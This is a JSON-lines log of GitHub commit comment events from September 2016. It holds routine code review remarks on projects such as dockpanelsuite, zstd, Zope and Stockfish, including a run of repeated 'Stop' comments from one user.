{"id":"4519406802","type":"CommitCommentEvent","actor":{"login":"j-lee"},"repo":{"name":"j-lee/node-dependency-tree"},"payload":{"comment":{"id":18906003,"position":23,"line":139,"path":"index.js","commit_id":"944064b6f506c40e093196c94f25146ddd3b835d","created_at":"2016-09-06T06:11:22Z","updated_at":"2016-09-06T06:11:22Z","body":"Testing this via the tests, I'm not sure why this doesn't seem to work inside the `if (!exists) {}` condition. In the test, the variable `exists` seems to resolve to true and never goes in, so that's why I've kept this out."}},"created_at":"2016-09-06T06:11:22Z"}
{"id":"4519413506","type":"CommitCommentEvent","actor":{"login":"j-lee"},"repo":{"name":"j-lee/node-dependency-tree"},"payload":{"comment":{"id":18906009,"position":31,"line":203,"path":"index.js","commit_id":"944064b6f506c40e093196c94f25146ddd3b835d","created_at":"2016-09-06T06:13:48Z","updated_at":"2016-09-06T06:13:48Z","body":"I guess I didn't really need this with the logic above..."}},"created_at":"2016-09-06T06:13:48Z"}
{"id":"4519414123","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18906011,"position":null,"line":null,"path":null,"commit_id":"495d6d04e07665dca15ae3aa2561c1048ed6fd62","created_at":"2016-09-06T06:14:04Z","updated_at":"2016-09-06T06:14:04Z","body":"@Sami32 looking good, thanks :)"}},"created_at":"2016-09-06T06:14:04Z"}
{"id":"4519416536","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"nabeshin/dockpanelsuite"},"payload":{"comment":{"id":18906013,"position":25,"line":367,"path":"WinFormsUI/Docking/DockPanel.MdiClientController.cs","commit_id":"3bcddb1837e19e23f6f547975b907b0dc30207db","created_at":"2016-09-06T06:14:57Z","updated_at":"2016-09-06T06:14:57Z","body":"This is an interesting change. Will further review."}},"created_at":"2016-09-06T06:14:57Z"}
{"id":"4519417907","type":"CommitCommentEvent","actor":{"login":"Drifftr"},"repo":{"name":"wso2/devstudio-tooling-bps"},"payload":{"comment":{"id":18906016,"position":13,"line":109,"path":"plugins/org.wso2.developerstudio.humantaskeditor/src/org/wso2/developerstudio/humantaskeditor/wizards/HumanTaskProjectWizard.java","commit_id":"7cb3a353d8647279fba81e917695e697fa5df9ec","created_at":"2016-09-06T06:15:26Z","updated_at":"2016-09-06T06:15:26Z","body":"Fixed in https://github.com/wso2/devstudio-tooling-bps/pull/28/commits/593a54787d92ac41debf50fe553770dc53ff9877"}},"created_at":"2016-09-06T06:15:26Z"}
{"id":"4519418996","type":"CommitCommentEvent","actor":{"login":"icemac"},"repo":{"name":"zopefoundation/ZServer"},"payload":{"comment":{"id":18906018,"position":13,"line":111,"path":"src/Products/SiteAccess/VirtualHostMonster.py","commit_id":"1d68460a6468ac55ab932b8b89aef31b1d445852","created_at":"2016-09-06T06:15:49Z","updated_at":"2016-09-06T06:15:49Z","body":"@hannosch Where is assured that raising this exception does not abort the transaction?\r\nIf I recall correctly (at least in older Zope 2 versions) I had to avoid theses kind of redirects."}},"created_at":"2016-09-06T06:15:49Z"}
{"id":"4519419572","type":"CommitCommentEvent","actor":{"login":"shuangzhou"},"repo":{"name":"nla/amberdb"},"payload":{"comment":{"id":18906019,"position":null,"line":null,"path":null,"commit_id":"d6477c1af7e9b1e51ffcbbdf5eca36102d0fabb2","created_at":"2016-09-06T06:16:00Z","updated_at":"2016-09-06T06:16:00Z","body":"👍 "}},"created_at":"2016-09-06T06:16:00Z"}
{"id":"4519419724","type":"CommitCommentEvent","actor":{"login":"Drifftr"},"repo":{"name":"wso2/devstudio-tooling-bps"},"payload":{"comment":{"id":18906020,"position":3,"line":35,"path":"plugins/org.wso2.developerstudio.humantaskeditor/src/org/wso2/developerstudio/humantaskeditor/editors/HumanTaskUIEditor.java","commit_id":"fd8213bb1ea8c020c2bcc2893f788ddfafb87b32","created_at":"2016-09-06T06:16:04Z","updated_at":"2016-09-06T06:16:04Z","body":"Fixed in https://github.com/wso2/devstudio-tooling-bps/pull/28/commits/593a54787d92ac41debf50fe553770dc53ff9877"}},"created_at":"2016-09-06T06:16:04Z"}
{"id":"4519419748","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"nabeshin/dockpanelsuite"},"payload":{"comment":{"id":18906021,"position":null,"line":null,"path":null,"commit_id":"3bcddb1837e19e23f6f547975b907b0dc30207db","created_at":"2016-09-06T06:16:05Z","updated_at":"2016-09-06T06:16:05Z","body":"Tracked in https://github.com/dockpanelsuite/dockpanelsuite/issues/395"}},"created_at":"2016-09-06T06:16:05Z"}
{"id":"4519420709","type":"CommitCommentEvent","actor":{"login":"EcutDavid"},"repo":{"name":"EcutDavid/data-tree-view"},"payload":{"comment":{"id":18906023,"position":7,"line":83,"path":"app.js","commit_id":"83a61dd13b2f3971cea65ca6a14d6d70ea695ee1","created_at":"2016-09-06T06:16:24Z","updated_at":"2016-09-06T06:16:24Z","body":"Hmm.... I think I should change my editor's configuration, the indent looks weird here."}},"created_at":"2016-09-06T06:16:24Z"}
{"id":"4519421631","type":"CommitCommentEvent","actor":{"login":"kshchepanovskyi"},"repo":{"name":"crkochan/zkcopy"},"payload":{"comment":{"id":18906025,"position":null,"line":null,"path":null,"commit_id":"6cb1357f397c49ceef42c23f94e8bc8540602146","created_at":"2016-09-06T06:16:45Z","updated_at":"2016-09-06T06:16:45Z","body":"Backported :)"}},"created_at":"2016-09-06T06:16:45Z"}
{"id":"4519424538","type":"CommitCommentEvent","actor":{"login":"Rikk"},"repo":{"name":"piroor/multipletab"},"payload":{"comment":{"id":18906028,"position":null,"line":null,"path":null,"commit_id":"089f676a18434d0b954ffcf5a4c01a9383f9dc4d","created_at":"2016-09-06T06:17:45Z","updated_at":"2016-09-06T06:17:45Z","body":"Hello, this commit introduces a regression:\r\nWhen moving multiple selected tabs between other tabs in the same window, they are not dropped in the correct position. Usually they are placed 1 or 2 after or before the desired point where they where dropped.\r\nLast good commit is 671c5709f90e9f968cf1473abca420b7bea4e0c6 (the predecessor of this)."}},"created_at":"2016-09-06T06:17:45Z"}
{"id":"4519427084","type":"CommitCommentEvent","actor":{"login":"wuyu122815205"},"repo":{"name":"Junrui-L/browserSync-Demo"},"payload":{"comment":{"id":18906032,"position":9,"line":8,"path":"README.md","commit_id":"c89a6f94b50a10bd2d666e5f4d0734fb9a856079","created_at":"2016-09-06T06:18:37Z","updated_at":"2016-09-06T06:18:37Z","body":"2"}},"created_at":"2016-09-06T06:18:37Z"}
{"id":"4519427684","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"electroly/ospa-dockpanelsuite"},"payload":{"comment":{"id":18906033,"position":null,"line":null,"path":null,"commit_id":"3fe9f55df5836edd0ec197c6582c394feb538a4d","created_at":"2016-09-06T06:18:49Z","updated_at":"2016-09-06T06:18:49Z","body":"This commit is reviewed. The up stream version uses a better approach now to render this element."}},"created_at":"2016-09-06T06:18:49Z"}
{"id":"4519428741","type":"CommitCommentEvent","actor":{"login":"linsoong"},"repo":{"name":"git/git"},"payload":{"comment":{"id":18906037,"position":null,"line":null,"path":null,"commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2016-09-06T06:19:11Z","updated_at":"2016-09-06T06:19:11Z","body":"Mark"}},"created_at":"2016-09-06T06:19:11Z"}
{"id":"4519430096","type":"CommitCommentEvent","actor":{"login":"icemac"},"repo":{"name":"zopefoundation/Zope"},"payload":{"comment":{"id":18906040,"position":4,"line":34,"path":"CHANGES.rst","commit_id":"4b3b028139a84be7489ff34c91ecd14a99124c01","created_at":"2016-09-06T06:19:37Z","updated_at":"2016-09-06T06:19:37Z","body":"@hannosch What do you suggest as replacement for repoze.tm2?"}},"created_at":"2016-09-06T06:19:37Z"}
{"id":"4519430592","type":"CommitCommentEvent","actor":{"login":"baranowb"},"repo":{"name":"baranowb/wildfly-core"},"payload":{"comment":{"id":18906042,"position":12,"line":269,"path":"cli/src/main/java/org/jboss/as/cli/handlers/BaseOperationCommand.java","commit_id":"85d35a4b0fa906b0ecb0a8d6bca360fe9e2aac64","created_at":"2016-09-06T06:19:47Z","updated_at":"2016-09-06T06:19:47Z","body":"Sure."}},"created_at":"2016-09-06T06:19:47Z"}
{"id":"4519433174","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"electroly/ospa-dockpanelsuite"},"payload":{"comment":{"id":18906045,"position":null,"line":null,"path":null,"commit_id":"53bd8c6d2e1ef0f4a68654782cf1152fa023d5c1","created_at":"2016-09-06T06:20:38Z","updated_at":"2016-09-06T06:20:38Z","body":"This commit is reviewed. The upstream version matches better to VS."}},"created_at":"2016-09-06T06:20:38Z"}
{"id":"4519435366","type":"CommitCommentEvent","actor":{"login":"mikey"},"repo":{"name":"amboar/linux"},"payload":{"comment":{"id":18906047,"position":null,"line":null,"path":null,"commit_id":"eac313ec1c5b8428c2c119cc25566422bd3d2cef","created_at":"2016-09-06T06:21:21Z","updated_at":"2016-09-06T06:21:21Z","body":"This might be overly complex, but....\r\n\r\n\tapss@38 {\r\n\t\tcompatible = \"ibm,apss\";\r\n\t\treg = <0x38>;\r\n\r\n\t\tpower1_input {\r\n\t\t\tcompatible = \"linear\";\r\n\t\t\tname = \"Fans\";\r\n\t\t\tchannel = <13>;\r\n\t\t\tscale = <17>; /* *** OR use the scale from below */\r\n\t\t\toffset = <29>; /* *** OR use the zero below offset */\r\n\t\t};\r\n\r\n\t\tpower2_input {\r\n\t\t\tcompatible = \"linear\";\r\n\t\t\tname = \"CPU\";\r\n\t\t\tchannel = < 3 4 >; /* multi channel to add together */\r\n\t\t\tscale = <17>; /* *** OR use the scale from below */\r\n\t\t\toffset = <29>; /* *** OR use the zero below offset */\r\n\t\t};\r\n\r\n\t\t/* derive the zero offset here */\r\n\t\tpower3_input {\r\n\t\t\tcompatible = \"calibrate\";\r\n\t\t\tname = \"zero\";\r\n\t\t\tchannel = <1>;\r\n\t\t\tvalue = 0; /* 0W */\r\n\t\t};\r\n\r\n\t\t/* derive the scale from here and zero */\r\n\t\tpower3_input {\r\n\t\t\tcompatible = \"calibrate\";\r\n\t\t\tname = \"220W\";\r\n\t\t\tchannel = <9>;\r\n\t\t\tvalue = 220; /* 0 */\r\n\t\t};\r\n\t};\r\n"}},"created_at":"2016-09-06T06:21:21Z"}
{"id":"4519436606","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906050,"position":3,"line":220,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:21:45Z","updated_at":"2016-09-06T06:21:45Z","body":"Stop "}},"created_at":"2016-09-06T06:21:45Z"}
{"id":"4519437100","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906052,"position":23,"line":264,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:21:59Z","updated_at":"2016-09-06T06:21:59Z","body":"Stop "}},"created_at":"2016-09-06T06:21:59Z"}
{"id":"4519437380","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"DavidBasnett/dockpanelsuite"},"payload":{"comment":{"id":18906053,"position":null,"line":null,"path":null,"commit_id":"2d4758ef9dae62d9777390346b9eb25e62a87d76","created_at":"2016-09-06T06:22:04Z","updated_at":"2016-09-06T06:22:04Z","body":"This commit will be cherry picked soon."}},"created_at":"2016-09-06T06:22:04Z"}
{"id":"4519437543","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906054,"position":30,"line":271,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:22:08Z","updated_at":"2016-09-06T06:22:08Z","body":"Stop "}},"created_at":"2016-09-06T06:22:08Z"}
{"id":"4519438637","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906058,"position":49,"line":322,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:22:30Z","updated_at":"2016-09-06T06:22:30Z","body":"Stop "}},"created_at":"2016-09-06T06:22:30Z"}
{"id":"4519439627","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906062,"position":63,"line":342,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:22:50Z","updated_at":"2016-09-06T06:22:50Z","body":"Stop "}},"created_at":"2016-09-06T06:22:50Z"}
{"id":"4519440127","type":"CommitCommentEvent","actor":{"login":"Thomas--S"},"repo":{"name":"HybridDog/streets"},"payload":{"comment":{"id":18906065,"position":null,"line":null,"path":null,"commit_id":"69b87ca345c90db168ef0f726e34730a0fdeccb2","created_at":"2016-09-06T06:23:00Z","updated_at":"2016-09-06T06:23:00Z","body":"Ok. Thank you very much!"}},"created_at":"2016-09-06T06:23:00Z"}
{"id":"4519440363","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906066,"position":108,"line":2996,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:23:06Z","updated_at":"2016-09-06T06:23:06Z","body":"Stop "}},"created_at":"2016-09-06T06:23:06Z"}
{"id":"4519440934","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906068,"position":113,"line":3001,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:23:17Z","updated_at":"2016-09-06T06:23:17Z","body":"Stop "}},"created_at":"2016-09-06T06:23:17Z"}
{"id":"4519441296","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"nabeshin/dockpanelsuite"},"payload":{"comment":{"id":18906069,"position":null,"line":null,"path":null,"commit_id":"02f7b7b7bf698bdafb534b0d67965954e0bf59ff","created_at":"2016-09-06T06:23:24Z","updated_at":"2016-09-06T06:23:24Z","body":"This commit was reviewed. The upstream version matches better to VS."}},"created_at":"2016-09-06T06:23:24Z"}
{"id":"4519441485","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18906071,"position":null,"line":null,"path":null,"commit_id":"4b85abbc2a1a8dd7d5802b20839605a20bdcec02","created_at":"2016-09-06T06:23:28Z","updated_at":"2016-09-06T06:23:28Z","body":"This doesn't work for the file H:\r\n````\r\n    file_bb(f + File(1))\r\n````\r\n\r\nYou should use instead:\r\n````\r\n    (file_bb(f) << 1) & ~FileABB;\r\n````"}},"created_at":"2016-09-06T06:23:28Z"}
{"id":"4519442164","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906072,"position":129,"line":3017,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:23:39Z","updated_at":"2016-09-06T06:23:39Z","body":"Stop "}},"created_at":"2016-09-06T06:23:39Z"}
{"id":"4519442553","type":"CommitCommentEvent","actor":{"login":"rmu75"},"repo":{"name":"openmediavault/openmediavault"},"payload":{"comment":{"id":18906074,"position":21,"line":279,"path":"deb/openmediavault/usr/share/openmediavault/engined/rpc/sharemgmt.inc","commit_id":"b7d9b809f9d433a484c17138a731349ad69643bf","created_at":"2016-09-06T06:23:47Z","updated_at":"2016-09-06T06:23:47Z","body":"This shouldn't be required to be unique. Makes it impossible to share two volumes with reldirpath='/'.\r\n\r\nPerhaps checking for uniqueness of volume/drive + reldirpath or uniqueness of absolute path was intended?"}},"created_at":"2016-09-06T06:23:47Z"}
{"id":"4519442755","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906075,"position":131,"line":3019,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:23:51Z","updated_at":"2016-09-06T06:23:51Z","body":"Stop "}},"created_at":"2016-09-06T06:23:51Z"}
{"id":"4519443445","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906077,"position":140,"line":3028,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:24:05Z","updated_at":"2016-09-06T06:24:05Z","body":"Stop "}},"created_at":"2016-09-06T06:24:05Z"}
{"id":"4519443866","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"nabeshin/dockpanelsuite"},"payload":{"comment":{"id":18906082,"position":null,"line":null,"path":null,"commit_id":"5d72b86b5237830d05559bbbb2c942d6b650f7da","created_at":"2016-09-06T06:24:13Z","updated_at":"2016-09-06T06:24:13Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/320"}},"created_at":"2016-09-06T06:24:13Z"}
{"id":"4519444312","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906083,"position":144,"line":3032,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:24:23Z","updated_at":"2016-09-06T06:24:23Z","body":"Stop "}},"created_at":"2016-09-06T06:24:23Z"}
{"id":"4519444530","type":"CommitCommentEvent","actor":{"login":"kagikn"},"repo":{"name":"TORISOUP/GTAV_InfernoScripts"},"payload":{"comment":{"id":18906084,"position":4,"line":15,"path":"Inferno/ExtensionMethods/NativeFunctions.cs","commit_id":"24206ebb145a24ff38a4d075cbb0f3b94d28ef1b","created_at":"2016-09-06T06:24:29Z","updated_at":"2016-09-06T06:24:29Z","body":"このメソッドを作る必要ないかと(v2.9.2の時点で既にEntity.IsTouchingは実装されている)"}},"created_at":"2016-09-06T06:24:29Z"}
{"id":"4519444947","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"nabeshin/dockpanelsuite"},"payload":{"comment":{"id":18906085,"position":null,"line":null,"path":null,"commit_id":"84dd926e4904fb742c46e02969833000adc3470b","created_at":"2016-09-06T06:24:37Z","updated_at":"2016-09-06T06:24:37Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/320"}},"created_at":"2016-09-06T06:24:37Z"}
{"id":"4519445786","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906086,"position":144,"line":3032,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:24:53Z","updated_at":"2016-09-06T06:24:53Z","body":"Stop "}},"created_at":"2016-09-06T06:24:53Z"}
{"id":"4519445793","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"nabeshin/dockpanelsuite"},"payload":{"comment":{"id":18906087,"position":null,"line":null,"path":null,"commit_id":"7d04cc16d25be94d2b0d51ff665fc45866d33c59","created_at":"2016-09-06T06:24:53Z","updated_at":"2016-09-06T06:24:53Z","body":"Tracked under https://github.com/dockpanelsuite/dockpanelsuite/issues/320"}},"created_at":"2016-09-06T06:24:53Z"}
{"id":"4519446662","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906089,"position":154,"line":3042,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:25:10Z","updated_at":"2016-09-06T06:25:10Z","body":"Stop "}},"created_at":"2016-09-06T06:25:10Z"}
{"id":"4519447310","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906090,"position":19,"line":256,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:25:22Z","updated_at":"2016-09-06T06:25:22Z","body":"Stop "}},"created_at":"2016-09-06T06:25:22Z"}
{"id":"4519447979","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906092,"position":29,"line":270,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:25:35Z","updated_at":"2016-09-06T06:25:35Z","body":"Stop "}},"created_at":"2016-09-06T06:25:35Z"}
{"id":"4519448652","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906094,"position":33,"line":261,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:25:50Z","updated_at":"2016-09-06T06:25:50Z","body":"Stop "}},"created_at":"2016-09-06T06:25:50Z"}
{"id":"4519449288","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906095,"position":32,"line":260,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:26:03Z","updated_at":"2016-09-06T06:26:03Z","body":"Stop "}},"created_at":"2016-09-06T06:26:03Z"}
{"id":"4519450542","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906097,"position":50,"line":324,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:26:30Z","updated_at":"2016-09-06T06:26:30Z","body":"Stop "}},"created_at":"2016-09-06T06:26:30Z"}
{"id":"4519451113","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906099,"position":65,"line":344,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:26:42Z","updated_at":"2016-09-06T06:26:42Z","body":"Stop "}},"created_at":"2016-09-06T06:26:42Z"}
{"id":"4519451674","type":"CommitCommentEvent","actor":{"login":"chq901226"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906100,"position":87,"line":87,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T06:26:52Z","updated_at":"2016-09-06T06:26:52Z","body":"优化：使用逗号运算符可以在一条语句里执行多个操作。多用于声明多个变量：var a =1,b={},c = [];"}},"created_at":"2016-09-06T06:26:52Z"}
{"id":"4519452048","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906101,"position":75,"line":354,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:26:59Z","updated_at":"2016-09-06T06:26:59Z","body":"Stop "}},"created_at":"2016-09-06T06:26:59Z"}
{"id":"4519452876","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906102,"position":84,"line":317,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:27:16Z","updated_at":"2016-09-06T06:27:16Z","body":"Stop "}},"created_at":"2016-09-06T06:27:16Z"}
{"id":"4519453997","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906104,"position":89,"line":370,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:27:38Z","updated_at":"2016-09-06T06:27:38Z","body":"Stop "}},"created_at":"2016-09-06T06:27:38Z"}
{"id":"4519454630","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906107,"position":91,"line":372,"path":"lib/legacy/zstd_v03.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:27:50Z","updated_at":"2016-09-06T06:27:50Z","body":"Stop "}},"created_at":"2016-09-06T06:27:50Z"}
{"id":"4519455825","type":"CommitCommentEvent","actor":{"login":"pswamikr"},"repo":{"name":"ibmdb/node-ibm_db"},"payload":{"comment":{"id":18906115,"position":null,"line":null,"path":null,"commit_id":"d5fc49a15b6864b8b454fa7720294a93b8e0b924","created_at":"2016-09-06T06:28:15Z","updated_at":"2016-09-06T06:28:15Z","body":"Thankyou @bimalkjha  , much appreciate for your rapid response , I did use npm install <git://xxxxx> and I see the new code. Now comes the fun part, I still see the same pattern results , \r\n\r\nvar query = \"CaLL BPC_BM.APPLICATION_SCHEMA_CHECK_SP(?, ? ,?, ?, ?)\";\r\n\r\nvar params = [] ;\r\n    params.push(runId);\r\n    params.push(0);\r\n    params.push('');\r\n    params.push('');\r\n    params.push(0)\r\nconsole.log(params);\r\nvar rows = tarConn.querySync(query, params) \r\nconsole.log(rows);\r\nThis stored procedure takes 1 input and the rest of them are outputs from stored procedure , \r\n[ 301, 0, '', '', 0 ]\r\n[]\r\n\r\nAs you can see the last console output  show empty array. Any assistance from you will be of much help here.\r\n"}},"created_at":"2016-09-06T06:28:15Z"}
{"id":"4519457010","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"misterboe/slickcarousel"},"payload":{"comment":{"id":18906120,"position":null,"line":null,"path":null,"commit_id":"9f6778e02cbddda66682be69fd872e6e654db13f","created_at":"2016-09-06T06:28:40Z","updated_at":"2016-09-06T06:28:40Z","body":"- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:0000000070b08091000000001c92b9cc:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '1.0.1' 'https://github.com/misterboe/slickcarousel.git' /tmp/9f6778e02cbddda66682be69fd872e6e654db13f/slickcarousel\n  - NamelessCoder\\TYPO3RepositoryGizzle\\GizzlePlugins\\ExtensionRepositoryReleasePlugin:0000000070b0808f000000001c92b9cc:\n    - resultCode: 10504\n    - resultMessages:\n      - 0: Please note that it might take a while (up to an hour) until your extension and the documentation appear on TYPO3.org.\n      - version: 1.0.1"}},"created_at":"2016-09-06T06:28:40Z"}
{"id":"4519457373","type":"CommitCommentEvent","actor":{"login":"chq901226"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906122,"position":119,"line":119,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T06:28:46Z","updated_at":"2016-09-06T06:28:46Z","body":"console.log(),console.info()之类的调试语句是很影响性能的"}},"created_at":"2016-09-06T06:28:46Z"}
{"id":"4519458106","type":"CommitCommentEvent","actor":{"login":"linsoong"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":18906125,"position":null,"line":null,"path":null,"commit_id":"1da177e4c3f41524e886b7f1b8a0c1fc7321cac2","created_at":"2016-09-06T06:28:57Z","updated_at":"2016-09-06T06:28:57Z","body":"ha"}},"created_at":"2016-09-06T06:28:57Z"}
{"id":"4519458815","type":"CommitCommentEvent","actor":{"login":"pulsecannon"},"repo":{"name":"pulsecannon/KEPA"},"payload":{"comment":{"id":18906126,"position":40,"line":40,"path":"models.py","commit_id":"0d465cfd5b3f7a03461207a0d43b93a46cd74a40","created_at":"2016-09-06T06:29:12Z","updated_at":"2016-09-06T06:29:12Z","body":"Ah good question. This is the convention I use internally at Google. Though\nthere is some discussion going within the google community on the use of\nCamelCase class methods.\n\nOn Sat, Aug 13, 2016 at 12:09 PM, daronstinnett <notifications@github.com>\nwrote:\n\n> Why are you using camel case for class methods?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pulsecannon/KEPA/commit/0d465cfd5b3f7a03461207a0d43b93a46cd74a40#commitcomment-18632936>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGLIPHrYjo5eHtwIT5TT0QW64Qr6z7nTks5qfhZWgaJpZM4JjvVh>\n> .\n>\n\n\n\n-- \nRegards,\nPranav.\n"}},"created_at":"2016-09-06T06:29:12Z"}
{"id":"4519459458","type":"CommitCommentEvent","actor":{"login":"billy77777"},"repo":{"name":"bos/zstd"},"payload":{"comment":{"id":18906129,"position":1,"line":218,"path":"lib/legacy/zstd_v02.c","commit_id":"a7bb322a9354ecba504a2131590bab38d635b2cc","created_at":"2016-09-06T06:29:25Z","updated_at":"2016-09-06T06:29:25Z","body":"Stop "}},"created_at":"2016-09-06T06:29:25Z"}
{"id":"4519460707","type":"CommitCommentEvent","actor":{"login":"hongdou0216"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18906135,"position":166,"line":166,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-06T06:29:50Z","updated_at":"2016-09-06T06:29:50Z","body":"循环content，返回keyArr数组，使用$$map更合理"}},"created_at":"2016-09-06T06:29:50Z"}
